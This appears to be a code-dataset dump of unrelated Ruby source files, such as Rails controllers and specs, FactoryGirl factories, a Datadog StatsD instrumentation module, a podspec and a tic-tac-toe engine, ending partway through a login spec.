hexsha
stringlengths 40
40
| size
int64 2
1.01M
| content
stringlengths 2
1.01M
| avg_line_length
float64 1.5
100
| max_line_length
int64 2
1k
| alphanum_fraction
float64 0.25
1
|
---|---|---|---|---|---|
18f9ba4bdb05be0c35e435235383ee825e36f00b | 63 | module Railcart
module Rails
VERSION = "0.1.0"
end
end
| 10.5 | 21 | 0.650794 |
e862e74fed792e13dd425a334427a3fc0ba15cc4 | 186 | # frozen_string_literal: true
$LOAD_PATH.unshift File.expand_path('../lib', __dir__)
require 'ruby_minitest_analyzer'
require 'minitest/autorun'
require 'pry'
require 'mocha/minitest'
| 20.666667 | 54 | 0.790323 |
39f1d5967dcbb74e4840db2990573414feb23e19 | 227 | # Load the Rails application.
require_relative 'application'
# Initialize the Rails application.
Rails.application.initialize!
# Initialize default meta tags.
DEFAULT_META = YAML.load_file(Rails.root.join('config/meta.yml'))
| 25.222222 | 65 | 0.797357 |
6a25f2c63cb77da9a3f076a3ff5e78b7c14a149a | 6,501 | # frozen_string_literal: true
begin
require "datadog/statsd"
rescue LoadError
$stderr.puts "In order to report Kafka client metrics to Datadog you need to install the `dogstatsd-ruby` gem."
raise
end
require "active_support/subscriber"
module Racecar
module Datadog
STATSD_NAMESPACE = "racecar"
class << self
def configure
yield self
end
def statsd
@statsd ||= ::Datadog::Statsd.new(host, port, namespace: namespace, tags: tags)
end
def statsd=(statsd)
clear
@statsd = statsd
end
def host
@host
end
def host=(host)
@host = host
clear
end
def port
@port
end
def port=(port)
@port = port
clear
end
def namespace
@namespace ||= STATSD_NAMESPACE
end
def namespace=(namespace)
@namespace = namespace
clear
end
def tags
@tags ||= []
end
def tags=(tags)
@tags = tags
clear
end
private
def clear
@statsd && @statsd.close
@statsd = nil
end
end
class StatsdSubscriber < ActiveSupport::Subscriber
private
%w[increment histogram count timing gauge].each do |type|
define_method(type) do |*args, **kwargs|
emit(type, *args, **kwargs)
end
end
def emit(type, *args, tags: {})
tags = tags.map {|k, v| "#{k}:#{v}" }.to_a
Racecar::Datadog.statsd.send(type, *args, tags: tags)
end
end
class ConsumerSubscriber < StatsdSubscriber
def process_message(event)
offset = event.payload.fetch(:offset)
create_time = event.payload.fetch(:create_time)
time_lag = create_time && ((Time.now - create_time) * 1000).to_i
tags = default_tags(event)
if event.payload.key?(:exception)
increment("consumer.process_message.errors", tags: tags)
else
timing("consumer.process_message.latency", event.duration, tags: tags)
increment("consumer.messages", tags: tags)
end
gauge("consumer.offset", offset, tags: tags)
# Not all messages have timestamps.
if time_lag
gauge("consumer.time_lag", time_lag, tags: tags)
end
end
def process_batch(event)
offset = event.payload.fetch(:last_offset)
messages = event.payload.fetch(:message_count)
last_create_time = event.payload.fetch(:last_create_time)
time_lag = last_create_time && ((Time.now - last_create_time) * 1000).to_i
tags = default_tags(event)
if event.payload.key?(:exception)
increment("consumer.process_batch.errors", tags: tags)
else
timing("consumer.process_batch.latency", event.duration, tags: tags)
count("consumer.messages", messages, tags: tags)
end
histogram("consumer.batch_size", messages, tags: tags)
gauge("consumer.offset", offset, tags: tags)
if time_lag
gauge("consumer.time_lag", time_lag, tags: tags)
end
end
def join_group(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
timing("consumer.join_group", event.duration, tags: tags)
if event.payload.key?(:exception)
increment("consumer.join_group.errors", tags: tags)
end
end
def leave_group(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
timing("consumer.leave_group", event.duration, tags: tags)
if event.payload.key?(:exception)
increment("consumer.leave_group.errors", tags: tags)
end
end
def poll_retry(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
rdkafka_error_code = event.payload.fetch(:exception).code.to_s.gsub(/\W/, '')
increment("consumer.poll.rdkafka_error.#{rdkafka_error_code}", tags: tags)
end
def main_loop(event)
tags = {
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
}
histogram("consumer.loop.duration", event.duration, tags: tags)
end
def pause_status(event)
duration = event.payload.fetch(:duration)
gauge("consumer.pause.duration", duration, tags: default_tags(event))
end
private
def default_tags(event)
{
client: event.payload.fetch(:client_id),
group_id: event.payload.fetch(:group_id),
topic: event.payload.fetch(:topic),
partition: event.payload.fetch(:partition),
}
end
attach_to "racecar"
end
class ProducerSubscriber < StatsdSubscriber
def produce_message(event)
client = event.payload.fetch(:client_id)
topic = event.payload.fetch(:topic)
message_size = event.payload.fetch(:message_size)
buffer_size = event.payload.fetch(:buffer_size)
tags = {
client: client,
topic: topic,
}
# This gets us the write rate.
increment("producer.produce.messages", tags: tags.merge(topic: topic))
# Information about typical/average/95p message size.
histogram("producer.produce.message_size", message_size, tags: tags.merge(topic: topic))
# Aggregate message size.
count("producer.produce.message_size.sum", message_size, tags: tags.merge(topic: topic))
# This gets us the avg/max buffer size per producer.
histogram("producer.buffer.size", buffer_size, tags: tags)
end
def deliver_messages(event)
client = event.payload.fetch(:client_id)
message_count = event.payload.fetch(:delivered_message_count)
tags = {
client: client,
}
timing("producer.deliver.latency", event.duration, tags: tags)
# Messages delivered to Kafka:
count("producer.deliver.messages", message_count, tags: tags)
end
def acknowledged_message(event)
tags = { client: event.payload.fetch(:client_id) }
# Number of messages ACK'd for the topic.
increment("producer.ack.messages", tags: tags)
end
attach_to "racecar"
end
end
end
| 26.21371 | 113 | 0.602061 |
1179b2ad0756b096d0c3217414e4a5deb18959ed | 113 | # encoding: UTF-8
require 'spec_helper'
describe CloudModel::Monitoring::Services::NginxChecks do
pending
end | 16.142857 | 57 | 0.787611 |
7a92c98b94e21266b2e27faa5aa8fdb23eb8f489 | 304 | # frozen_string_literal: true
require 'test_helper'
class VerificationsControllerTest < ActionController::TestCase
def test_show
subscription = subscriptions(:avery)
get :show, params: { subscription_id: subscription.id }
subscription.reload
assert subscription.validated?
end
end
| 21.714286 | 62 | 0.769737 |
03fa7cc9404c9c26d60b688e2a1ae4e676e28022 | 948 | Pod::Spec.new do |s|
s.name = "DataEyeGameAnalysis"
s.version = "2.7.5"
s.summary = "DataEye game analysis SDK of iOS platform. Please use the new version as far as possible, the new version is at https://github.com/DataEye/DataEyeGameAnalysis."
s.description = <<-DESC
This project is for DataEye game analysis SDK. Developer can get it easily on by cocoaPods.
DESC
s.homepage = "https://www.dataeye.com"
s.license = 'MIT'
s.author = { "xqwang" => "[email protected]" }
s.source = { :git => "https://github.com/DataEye/DataEyeGameAnalysis_V1.git", :tag => "2.7.5" }
s.platform = :ios, '6.0'
s.requires_arc = true
s.source_files = 'DataEyeGameAnalysis_V1/*.h'
s.vendored_libraries = 'DataEyeGameAnalysis_V1/*.a'
s.frameworks = "AdSupport", "Security", "CoreTelephony", "SystemConfiguration"
s.libraries = "z"
end
| 41.217391 | 184 | 0.622363 |
210ea0e467fab88b2a37d78798afdbdb41942186 | 310 | cask 'supersync' do
version '7.0.5'
sha256 '188a60ae85f0dc2d8df633dfb95241a65f163dd3b370c883f7f3366ad748d4f7'
url "https://supersync.com/downloads/SuperSync_#{version}.dmg"
appcast 'https://supersync.com/downloads.php'
name 'SuperSync'
homepage 'https://supersync.com/'
app 'SuperSync.app'
end
| 25.833333 | 75 | 0.76129 |
f8ce80927394cbde64c56aeb64f309364cc16889 | 8,304 | require 'rails_helper'
describe Post do
let(:post) { FactoryGirl.create(:post) }
let(:valid_title) { 'today-i-learned-about-clojure' }
it 'should have a valid factory' do
expect(post).to be_valid
end
it 'should require a body' do
post.body = ''
expect(post).to_not be_valid
end
it 'should have a like count that defaults to one' do
expect(post.likes).to eq 1
end
it 'should require a developer' do
post.developer = nil
expect(post).to_not be_valid
end
it 'should require a channel' do
post.channel = nil
expect(post).to_not be_valid
end
it 'should require a title' do
post.title = nil
expect(post).to_not be_valid
end
it 'should reject a title that is more than fifty chars' do
post.title = 'a' * 51
expect(post).to_not be_valid
end
describe '#generate_slug' do
it 'should create a slug' do
expect(post.slug).to be
end
it 'should allow a custom slug' do
custom_slugged_post = FactoryGirl.create(:post, slug: '1234')
expect(custom_slugged_post.slug).to eq '1234'
end
end
it 'should create a slug with dashes' do
post.title = 'Today I learned about clojure'
expect(post.send(:slugified_title)).to eq valid_title
end
it 'should create a slug without multiple dashes' do
post.title = 'Today I learned --- about clojure'
expect(post.send(:slugified_title)).to eq valid_title
end
it 'should remove whitespace from slug' do
post.title = ' Today I learned about clojure '
expect(post.send(:slugified_title)).to eq valid_title
end
it 'should not allow punctuation in slug' do
post.title = 'Today I! learned? & $ % about #clojure'
expect(post.send(:slugified_title)).to eq valid_title
end
describe '#body_size' do
it 'should return true when the post is equal or below 200 words' do
post.body = 'word ' * 200
expect(post.send(:body_size)).to be
end
it 'should return false when the post is above 200 words' do
post.body = 'word ' * 201
expect(post.send(:body_size)).to eq false
end
it 'should behave like a validation and return an appropriate messsage' do
post.body = 'word ' * 200
expect(post).to be_valid
post.body = 'word ' * 201
expect(post).to_not be_valid
expect(post.errors.messages[:body]).to eq ['of this post is too long. It is 1 word over the limit of 200 words']
post.body = 'word ' * 300
expect(post).to_not be_valid
expect(post.errors.messages[:body]).to eq ['of this post is too long. It is 100 words over the limit of 200 words']
post.body = 'word ' * 400
expect(post).to_not be_valid
expect(post.errors.messages[:body]).to eq ['of this post is too long. It is 200 words over the limit of 200 words']
end
end
context 'it should count its words' do
it 'with trailing spaces' do
post = FactoryGirl.create(:post, body: 'word ' * 150)
expect(post.send(:word_count)).to eq 150
end
it 'with no trailing spaces' do
post = FactoryGirl.create(:post, body: ('word ' * 150).strip)
expect(post.send(:word_count)).to eq 150
end
it 'with one word' do
post = FactoryGirl.create(:post, body: 'word')
expect(post.send(:word_count)).to eq 1
end
end
context 'it should know how many words are available' do
it 'with trailing spaces' do
post = FactoryGirl.create(:post, body: 'word ' * 150)
expect(post.send(:words_remaining)).to eq 50
end
it 'with no trailing spaces' do
post = FactoryGirl.create(:post, body: ('word ' * 150).strip)
expect(post.send(:words_remaining)).to eq 50
end
it 'with one word' do
post = FactoryGirl.create(:post, body: 'word')
expect(post.send(:words_remaining)).to eq 199
end
it 'with too many words' do
post = FactoryGirl.build(:post, body: 'word ' * 300)
expect(post.send(:words_remaining)).to eq -100
end
end
describe '#search' do
it 'finds by developer' do
needle = %w(brian jake).map do |author_name|
FactoryGirl.create :post, developer: FactoryGirl.create(:developer, username: author_name)
end.last
expect(described_class.search('jake')).to eq [needle]
end
it 'finds by channel' do
needle = %w(vim ruby).map do |channel_name|
FactoryGirl.create :post, channel: FactoryGirl.create(:channel, name: channel_name)
end.last
expect(described_class.search('ruby')).to eq [needle]
end
it 'finds by title' do
needle = %w(postgres sql).map do |title|
FactoryGirl.create :post, title: title
end.last
expect(described_class.search('sql')).to eq [needle]
end
it 'finds by body' do
needle = %w(postgres sql).map do |body|
FactoryGirl.create :post, body: body
end.last
expect(described_class.search('sql')).to eq [needle]
end
it 'ranks matches by title, then developer or channel, then body' do
posts = [
FactoryGirl.create(:post, body: 'needle'),
FactoryGirl.create(:post, channel: FactoryGirl.create(:channel, name: 'needle')),
FactoryGirl.create(:post, developer: FactoryGirl.create(:developer, username: 'needle')),
FactoryGirl.create(:post, title: 'needle')
].reverse
ids = described_class.search('needle').pluck(:id)
expect(ids[1..-2]).to match_array posts.map(&:id)[1..-2]
expect([ids.first, ids.last]).to eq [posts.map(&:id).first, posts.map(&:id).last]
end
it 'breaks ties by post date' do
FactoryGirl.create(:post, title: 'older', body: 'needle', created_at: 2.days.ago)
FactoryGirl.create(:post, title: 'newer', body: 'needle')
expect(described_class.search('needle').map(&:title)).to eq %w(newer older)
end
end
it 'knows if its max likes count is a factor of ten' do
method = :likes_threshold?
post.max_likes = 10
expect(post.send(method)).to eq true
post.max_likes = 11
expect(post.send(method)).to eq false
end
it 'should never have a negative like count' do
post.likes = -1
expect(post).to_not be_valid
end
describe '#publish' do
it 'sets the post to published = true' do
post.publish
expect(post.published_at).to be
end
end
context 'slack integration on publication' do
describe 'new post, published is true' do
it 'should notify slack' do
post = FactoryGirl.build(:post)
expect(post).to receive(:notify_slack)
post.save
end
end
describe 'new post, published is false' do
it 'should not notify slack' do
post = FactoryGirl.build(:post, :draft)
expect(post).to_not receive(:notify_slack)
post.save
end
end
describe 'existing post, published changes to true' do
it 'should notify slack' do
post = FactoryGirl.create(:post, :draft)
post.published_at = Time.now
expect(post).to receive(:notify_slack)
post.save
end
end
end
describe '#increment_likes' do
it 'increments max likes when likes equals max likes' do
post = FactoryGirl.create(:post, likes: 5, max_likes: 5)
post.increment_likes
expect(post.likes).to eq 6
expect(post.max_likes).to eq 6
end
it 'does not change max likes when likes are less than max likes' do
post = FactoryGirl.create(:post, likes: 3, max_likes: 5)
post.increment_likes
expect(post.likes).to eq 4
expect(post.max_likes).to eq 5
end
end
describe '#decrement_likes' do
it 'does not change max likes' do
post = FactoryGirl.create(:post, likes: 5, max_likes: 5)
post.decrement_likes
expect(post.likes).to eq 4
expect(post.max_likes).to eq 5
end
end
context 'slack integration on tens of likes' do
describe 'reaches the milestone more than once' do
it 'should notify slack only once' do
post = FactoryGirl.create(:post, likes: 9, max_likes: 9)
expect(post).to receive(:notify_slack).once
post.increment_likes # 10
post.decrement_likes # 9
post.increment_likes # 10
post.increment_likes # 11
post.decrement_likes # 10
end
end
end
end
| 28.634483 | 121 | 0.647881 |
f71ac22dfee4ec66657a52f30a5fa4b4bbb5895c | 3,561 | require 'factory_girl'
FactoryGirl.define do
factory :alchemy_dummy_user, class: 'DummyUser' do
sequence(:email) { |n| "john.#{n}@doe.com" }
password 's3cr3t'
alchemy_roles ['member']
trait :as_admin do
alchemy_roles ['admin']
end
trait :as_author do
alchemy_roles ['author']
end
trait :as_editor do
alchemy_roles ['editor']
end
end
factory :language, :class => 'Alchemy::Language' do
name 'Deutsch'
code 'de'
default true
frontpage_name 'Intro'
page_layout { Alchemy::Config.get(:default_language)['page_layout'] }
public true
site { Alchemy::Site.first }
factory :klingonian do
name 'Klingonian'
code 'kl'
frontpage_name 'Tuq'
default false
end
factory :english do
name 'English'
code 'en'
frontpage_name 'Intro'
default false
end
end
factory :page, :class => 'Alchemy::Page' do
language { Alchemy::Language.default || FactoryGirl.create(:language) }
sequence(:name) { |n| "A Page #{n}" }
parent_id { (Alchemy::Page.find_by_language_root(true) || FactoryGirl.create(:language_root_page)).id }
page_layout "standard"
# This speeds up creating of pages dramatically. Pass :do_not_autogenerate => false to generate elements
do_not_autogenerate true
factory :language_root_page do
name 'Startseite'
page_layout { language.page_layout }
language_root true
public true
parent_id { Alchemy::Page.root.id }
end
factory :public_page do
sequence(:name) { |n| "A Public Page #{n}" }
public true
end
factory :systempage do
name "Systempage"
parent_id { Alchemy::Page.root.id }
language_root false
page_layout nil
language nil
end
factory :restricted_page do
name "Restricted page"
restricted true
end
end
factory :cell, :class => 'Alchemy::Cell' do
page { Alchemy::Page.find_by(language_root: true) || FactoryGirl.create(:language_root_page) }
name "a_cell"
end
factory :element, :class => 'Alchemy::Element' do
name 'article'
create_contents_after_create false
factory :unique_element do
unique true
name 'header'
end
end
factory :picture, :class => 'Alchemy::Picture' do
image_file File.new(File.expand_path('../../../../spec/fixtures/image.png', __FILE__))
name 'image'
image_file_name 'image.png'
upload_hash Time.now.hash
end
factory :content, :class => 'Alchemy::Content' do
name "text"
essence_type "Alchemy::EssenceText"
association :essence, :factory => :essence_text
end
factory :essence_text, :class => 'Alchemy::EssenceText' do
body ''
end
factory :essence_picture, :class => 'Alchemy::EssencePicture' do
picture
end
factory :essence_file, :class => 'Alchemy::EssenceFile' do
attachment
end
factory :attachment, :class => 'Alchemy::Attachment' do
file File.new(File.expand_path('../../../../spec/fixtures/image.png', __FILE__))
name 'image'
file_name 'image.png'
end
factory :event do
name 'My Event'
hidden_name 'not shown'
starts_at DateTime.new(2012, 03, 02, 8, 15)
ends_at DateTime.new(2012, 03, 02, 19, 30)
lunch_starts_at DateTime.new(2012, 03, 02, 12, 15)
lunch_ends_at DateTime.new(2012, 03, 02, 13, 45)
description "something\nfancy"
published false
entrance_fee 12.3
end
factory :site, class: 'Alchemy::Site' do
name 'A Site'
host 'domain.com'
end
end
| 24.060811 | 108 | 0.651502 |
e802626a0ac244b385b6362c4783cbc1b8e96ee5 | 2,063 | # NOTE: only doing this in development as some production environments (Heroku)
# NOTE: are sensitive to local FS writes, and besides -- it's just not proper
# NOTE: to have a dev-mode tool do its thing in production.
if Rails.env.development?
require 'annotate'
task :set_annotation_options do
# You can override any of these by setting an environment variable of the
# same name.
Annotate.set_defaults(
'active_admin' => 'false',
'additional_file_patterns' => [],
'routes' => 'false',
'models' => 'true',
'position_in_routes' => 'before',
'position_in_class' => 'before',
'position_in_test' => 'before',
'position_in_fixture' => 'before',
'position_in_factory' => 'before',
'position_in_serializer' => 'before',
'show_foreign_keys' => 'true',
'show_complete_foreign_keys' => 'false',
'show_indexes' => 'true',
'simple_indexes' => 'false',
'model_dir' => 'app/models',
'root_dir' => '',
'include_version' => 'false',
'require' => '',
'exclude_tests' => 'false',
'exclude_fixtures' => 'false',
'exclude_factories' => 'false',
'exclude_serializers' => 'false',
'exclude_scaffolds' => 'true',
'exclude_controllers' => 'true',
'exclude_helpers' => 'true',
'exclude_sti_subclasses' => 'false',
'ignore_model_sub_dir' => 'false',
'ignore_columns' => nil,
'ignore_routes' => nil,
'ignore_unknown_models' => 'false',
'hide_limit_column_types' => 'integer,bigint,boolean',
'hide_default_column_types' => 'json,jsonb,hstore',
'skip_on_db_migrate' => 'false',
'format_bare' => 'true',
'format_rdoc' => 'false',
'format_yard' => 'false',
'format_markdown' => 'false',
'sort' => 'false',
'force' => 'false',
'frozen' => 'false',
'classified_sort' => 'true',
'trace' => 'false',
'wrapper_open' => nil,
'wrapper_close' => nil,
'with_comment' => 'true'
)
end
Annotate.load_tasks
end
| 34.383333 | 79 | 0.594765 |
bb211c12ac0fbee72223d5e6968b5fbcc8859a9f | 1,892 | test_name 'C3448 - checkout a tag (http protocol)'
# Globals
repo_name = 'testrepo_tag_checkout'
tag = '0.0.2'
hosts.each do |host|
ruby = (host.is_pe? && '/opt/puppet/bin/ruby') || 'ruby'
tmpdir = host.tmpdir('vcsrepo')
step 'setup - create repo' do
install_package(host, 'git')
my_root = File.expand_path(File.join(File.dirname(__FILE__), '../../../..'))
scp_to(host, "#{my_root}/acceptance/files/create_git_repo.sh", tmpdir)
on(host, "cd #{tmpdir} && ./create_git_repo.sh")
end
step 'setup - start http server' do
http_daemon =<<-EOF
require 'webrick'
server = WEBrick::HTTPServer.new(:Port => 8000, :DocumentRoot => "#{tmpdir}")
WEBrick::Daemon.start
server.start
EOF
create_remote_file(host, '/tmp/http_daemon.rb', http_daemon)
on(host, "#{ruby} /tmp/http_daemon.rb")
end
teardown do
on(host, "rm -fr #{tmpdir}")
on(host, "ps ax | grep '#{ruby} /tmp/http_daemon.rb' | grep -v grep | awk '{print \"kill -9 \" $1}' | sh ; sleep 1")
end
step 'get tag sha from repo' do
on(host, "git --git-dir=#{tmpdir}/testrepo.git rev-list HEAD | tail -1") do |res|
@sha = res.stdout.chomp
end
end
step 'checkout a tag with puppet' do
pp = <<-EOS
vcsrepo { "#{tmpdir}/#{repo_name}":
ensure => present,
source => "http://#{host}:8000/testrepo.git",
provider => git,
revision => '#{tag}',
}
EOS
apply_manifest_on(host, pp, :catch_failures => true)
apply_manifest_on(host, pp, :catch_changes => true)
end
step "verify checkout out tag is #{tag}" do
on(host, "ls #{tmpdir}/#{repo_name}/.git/") do |res|
fail_test('checkout not found') unless res.stdout.include? "HEAD"
end
on(host,"git --git-dir=#{tmpdir}/#{repo_name}/.git name-rev HEAD") do |res|
fail_test('tag not found') unless res.stdout.include? "#{tag}"
end
end
end
| 29.5625 | 120 | 0.616808 |
08505ae8be54802710212f59abdb34098a90e0b0 | 2,219 | class TicTacToe
autoload :Printer, "tic_tac_toe/printer"
autoload :Game, "tic_tac_toe/game"
autoload :RandomPlayer, "tic_tac_toe/random_player"
autoload :ConsolePlayer, "tic_tac_toe/console_player"
autoload :MonteCarloPlayer, "tic_tac_toe/monte_carlo_player"
autoload :GrpcPlayer, "tic_tac_toe/grpc_player"
BadMove = Class.new(StandardError)
STATES = [
STATE_WIN = Object.new,
STATE_DRAW = Object.new,
STATE_RUNNING = Object.new,
].freeze
EMPTY = Object.new
PLAYERS = [
PLAYER_X = Object.new,
PLAYER_O = Object.new,
].freeze
WINS = [
[0, 1, 2],
[3, 4, 5],
[6, 7, 8],
[0, 3, 6],
[1, 4, 7],
[2, 5, 8],
[0, 4, 8],
[2, 4, 6],
].map(&:freeze).freeze
def self.empty_board
new(
board: Array.new(9) { EMPTY },
player: PLAYER_X,
history: []
)
end
attr_reader :board, :player, :history
def initialize(board:, player:, history:)
@board = board.map(&:freeze).freeze
@player = player
@history = history
end
def available_moves
return [] unless state == STATE_RUNNING
@available_moves ||=
@board
.map
.with_index
.select { |t, _| t == EMPTY }
.map { |_, i| i }
end
def play(move)
ensure_valid_move!(move)
new_board = @board.dup
new_board[move] = player
self.class.new(
board: new_board,
player: opposite_player,
history: history.dup.append(move)
)
end
def state
@state ||=
if win?
STATE_WIN
elsif @board.none? { |x| x == EMPTY }
STATE_DRAW
else
STATE_RUNNING
end
end
def running?
state == STATE_RUNNING
end
def draw?
state == STATE_DRAW
end
def win?
return @win if defined?(@win)
@win =
WINS
.map { |x, y, z| [@board[x], @board[y], @board[z]].uniq }
.any? { |x| (x.size == 1) && x.first != EMPTY }
end
def winner
return unless win?
opposite_player
end
private
def ensure_valid_move!(move)
return if available_moves.include?(move)
raise BadMove, "#{move} is not a valid move."
end
def opposite_player
@player == PLAYER_X ? PLAYER_O : PLAYER_X
end
end
| 18.491667 | 65 | 0.588103 |
1d7e698c49a37eac90af7510ac7a1a6aa0526637 | 377 | #! /usr/local/bin/ruby
require 'deduction.rb'
ded = CDeduction.new
buf = $mysql.query("select id from relation_node order by id desc limit 1;")
id = -1
id = ARGV[0].to_i if( ARGV[0] != nil )
if( id > 0 )
ded.read(id)
ded.printRel( 2 )
else
(buf.fetch_hash['id'].to_i - 1).times do |i|
ded.read(i + 1)
ded.printRel( 2 )
print "\n"
end
end
$mysql.close
| 15.708333 | 76 | 0.612732 |
e82b94a378989795e344029ecc282276bef488a4 | 1,505 | module Monitr
module Configurable
# Override this method in your Configurable (optional)
#
# Called once after the Configurable has been sent to the block and attributes have been
# set. Do any post-processing on attributes here
def prepare
end
def reset
end
# Override this method in your Configurable (optional)
#
# Called once during evaluation of the config file. Return true if valid, false otherwise
#
# A convenience method 'complain' is available that will print out a message and return false,
# making it easy to report multiple validation errors:
#
# def valid?
# valid = true
# valid &= complain("You must specify the 'pid_file' attribute for :memory_usage") if self.pid_file.nil?
# valid &= complain("You must specify the 'above' attribute for :memory_usage") if self.above.nil?
# valid
# end
def valid?
true
end
def base_name
x = 1 # fix for MRI's local scope optimization bug DO NOT REMOVE!
self.class.name.split('::').last
end
def friendly_name
base_name
end
def self.complain(text, c = nil)
watch = c.watch rescue nil
msg = ""
msg += "#{watch.name}: " if watch
msg += text
msg += " for #{c.friendly_name}" if c
applog(watch, :error, msg)
false
end
def complain(text, c = nil)
Configurable.complain(text, c)
end
end
end | 26.403509 | 112 | 0.613289 |
87e8abaf8507a2cb675309f40104acbcdaeb84b2 | 1,328 | #-- copyright
# OpenProject is a project management system.
# Copyright (C) 2012-2015 the OpenProject Foundation (OPF)
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License version 3.
#
# OpenProject is a fork of ChiliProject, which is a fork of Redmine. The copyright follows:
# Copyright (C) 2006-2013 Jean-Philippe Lang
# Copyright (C) 2010-2013 the ChiliProject Team
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# See doc/COPYRIGHT.rdoc for more details.
#++
FactoryGirl.define do
factory :journal_wiki_content_journal, class: Journal::WikiContentJournal do
page_id 1
end
end
| 39.058824 | 91 | 0.765813 |
116f003777d99098c99f530198d89c83ee740c84 | 1,911 | class UsersController < ApplicationController
skip_before_action :authorized, only: %i[new create]
def index
User.who_to_follow_offset = 0
User.current_user = current_user
@posts = current_user.all_the_posts_for_timeline
@who_to_follow = current_user.who_to_follow
end
def new
redirect_to root_path if logged_in?
@user = User.new
end
def create
@user = User.new(user_params)
@user.photo = Faker::Avatar.image(slug: params[:username], size: '100x100', format: 'jpg')
@user.cover_image = Faker::LoremFlickr.image(size: '744x249', search_terms: ['nature'])
if @user.save
log_in @user
redirect_to root_path
else
@user.username = @user.full_name = ''
render 'new'
end
end
def search
User.who_to_follow_offset += 3
@who_to_follow = current_user.who_to_follow
render partial: 'users/index/who_to_follow'
end
def connection
user = User.find_by(username: params[:username])
User.current_user = user
@headline = headline(user, params[:slug])
if @headline.nil?
redirect_to root_path
else
@user_list = user_list(user, params[:slug])
@who_to_follow = user.who_to_follow
render partial: 'users/connection/user_list'
end
end
def follow
Following.create(follower_id: current_user.id, followed_id: params[:id])
redirect_to user_show_path(slug: User.find(params[:id]).username)
end
def unfollow
Following.destroy(Following.where(follower_id: current_user.id, followed_id: params[:id]).first.id)
redirect_to user_show_path(slug: User.find(params[:id]).username)
end
def show
User.current_user = current_user
@user = User.find_by(username: params[:slug])
@posts = @user.microposts
@who_to_follow = @user.followers.limit(3)
end
private
def user_params
params.require(:user).permit(:username, :full_name)
end
end
| 26.178082 | 103 | 0.69911 |
bb78078cb8da76b13b3ebf58753ec077f5b5a7fd | 502 | RSpec.shared_context "yammer GET" do |endpoint|
let(:request_url) { "https://www.yammer.com/api/v1/#{endpoint}" }
let!(:mock) {
stub_request(:get, request_url).with(
# See https://github.com/bblimke/webmock/issues/693
query: hash_including({}),
headers: {
'Authorization' => 'Bearer shakenn0tst1rr3d'
}
).
to_return(
status: 200,
body: {status: "ok"}.to_json,
headers: {
"Content-type": "application/json"
}
)
}
end
| 25.1 | 67 | 0.583665 |
edcf3f315a95d722336c56781d9ac7a897c815d3 | 1,162 | # frozen_string_literal: true
# WARNING ABOUT GENERATED CODE
#
# This file is generated. See the contributing guide for more information:
# https://github.com/aws/aws-sdk-ruby/blob/master/CONTRIBUTING.md
#
# WARNING ABOUT GENERATED CODE
Gem::Specification.new do |spec|
spec.name = "aws-sdk-athena"
spec.version = File.read(File.expand_path("../VERSION", __FILE__)).strip
spec.summary = "AWS SDK for Ruby - Amazon Athena"
spec.description = "Official AWS Ruby gem for Amazon Athena. This gem is part of the AWS SDK for Ruby."
spec.author = "Amazon Web Services"
spec.homepage = "https://github.com/aws/aws-sdk-ruby"
spec.license = "Apache-2.0"
spec.email = ["[email protected]"]
spec.require_paths = ["lib"]
spec.files = Dir["lib/**/*.cr"]
spec.metadata = {
"source_code_uri" => "https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-athena",
"changelog_uri" => "https://github.com/aws/aws-sdk-ruby/tree/master/gems/aws-sdk-athena/CHANGELOG.md"
}
spec.add_dependency("aws-sdk-core", "~> 3', '>= 3.109.0")
spec.add_dependency("aws-sigv4", "~> 1.1")
end
| 36.3125 | 107 | 0.662651 |
1d7099ba44389006fb5017d54e2a6a23fc7df705 | 29,704 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe 'Login' do
include TermsHelper
include UserLoginHelper
before do
stub_authentication_activity_metrics(debug: true)
end
describe 'password reset token after successful sign in' do
it 'invalidates password reset token' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
user = create(:user)
expect(user.reset_password_token).to be_nil
visit new_user_password_path
fill_in 'user_email', with: user.email
click_button 'Reset password'
user.reload
expect(user.reset_password_token).not_to be_nil
gitlab_sign_in(user)
expect(current_path).to eq root_path
user.reload
expect(user.reset_password_token).to be_nil
end
end
describe 'initial login after setup' do
it 'allows the initial admin to create a password' do
expect(authentication_metrics)
.to increment(:user_authenticated_counter)
# This behavior is dependent on there only being one user
User.delete_all
user = create(:admin, password_automatically_set: true)
visit root_path
expect(current_path).to eq edit_user_password_path
expect(page).to have_content('Please create a password for your new account.')
fill_in 'user_password', with: 'password'
fill_in 'user_password_confirmation', with: 'password'
click_button 'Change your password'
expect(current_path).to eq new_user_session_path
expect(page).to have_content(I18n.t('devise.passwords.updated_not_active'))
fill_in 'user_login', with: user.username
fill_in 'user_password', with: 'password'
click_button 'Sign in'
expect(current_path).to eq root_path
end
it 'does not show flash messages when login page' do
visit root_path
expect(page).not_to have_content('You need to sign in or sign up before continuing.')
end
end
describe 'with a blocked account' do
it 'prevents the user from logging in' do
expect(authentication_metrics)
.to increment(:user_blocked_counter)
.and increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
user = create(:user, :blocked)
gitlab_sign_in(user)
expect(page).to have_content('Your account has been blocked.')
end
it 'does not update Devise trackable attributes', :clean_gitlab_redis_shared_state do
expect(authentication_metrics)
.to increment(:user_blocked_counter)
.and increment(:user_unauthenticated_counter)
.and increment(:user_session_destroyed_counter).twice
user = create(:user, :blocked)
expect { gitlab_sign_in(user) }.not_to change { user.reload.sign_in_count }
end
end
describe 'with an unconfirmed email address' do
let!(:user) { create(:user, confirmed_at: nil) }
let(:grace_period) { 2.days }
before do
stub_application_setting(send_user_confirmation_email: true)
allow(User).to receive(:allow_unconfirmed_access_for).and_return grace_period
end
context 'within the grace period' do
it 'allows to login' do
